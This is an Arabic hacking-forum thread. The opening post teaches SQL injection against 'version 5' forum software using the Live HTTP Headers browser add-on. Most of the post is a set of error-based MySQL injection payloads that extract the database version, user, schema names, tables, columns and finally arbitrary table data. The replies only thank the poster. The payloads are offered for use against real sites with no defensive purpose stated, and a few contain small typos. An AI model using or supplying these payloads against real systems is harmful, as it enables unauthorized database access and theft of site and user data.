1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Spamber Dz | المشاهدات : 607 | الردود : 6
حالة الموضوع:
مغلق
  1. Spamber Dz Developer

    الأنتساب:
    ‏30 ديسمبر 2012
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    Dz
    السلام عليكم ورحمة الله وبركاته

    شرح ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الفديو

    [YOUTUBE]b2_UCsX1nWw[/YOUTUBE]

    لاداه : Live HTTP Headers

    رابط الاداه لمتصفح فايرفوكس

    بعض الحركات المستخدمه في الشرح

    كود PHP:
    *********************************************************************************************************************
    |
    Version():
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    User():
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Database():
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************


     *********************************************************************************************************************
    |
    Database Print:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Table Count:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |Print 
    Tables:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Columns of selected table:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Fetch Out Data:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************
     
  2. ملـك بدون مملكه DeveloPer Plus

    الأنتساب:
    ‏11 ديسمبر 2011
    المشاركات:
    101
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    الإقامة:
    لـــبـــنـــان صـــيــدا
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الله يعطيك الف عافية اخوي
     
  3. R0CKO Developer

    الأنتساب:
    ‏8 يوليو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    ســــ(حـرة)ــوريــة اّبيــــــــــة
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    السلام عليكم
    تسلم يا غالي
     
  4. Ahmed Hamody ExpErt DeveloPer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    مش هقول اني من مصر
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    دايم بطل ومبدع يا صاحبي واصل
     
  5. intel Developer

    الأنتساب:
    ‏3 ديسمبر 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    موفقـ..
     
  6. Red Virus Developer

    الأنتساب:
    ‏4 ديسمبر 2012
    المشاركات:
    60
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الف شكر لك يالغالي

    جعلها بميزان حسناتك
     
  7. Egy HacKerS DeveloPer Plus

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    50
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    احسنت اخى الكريم

    موضوع فى قمة الافاده
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة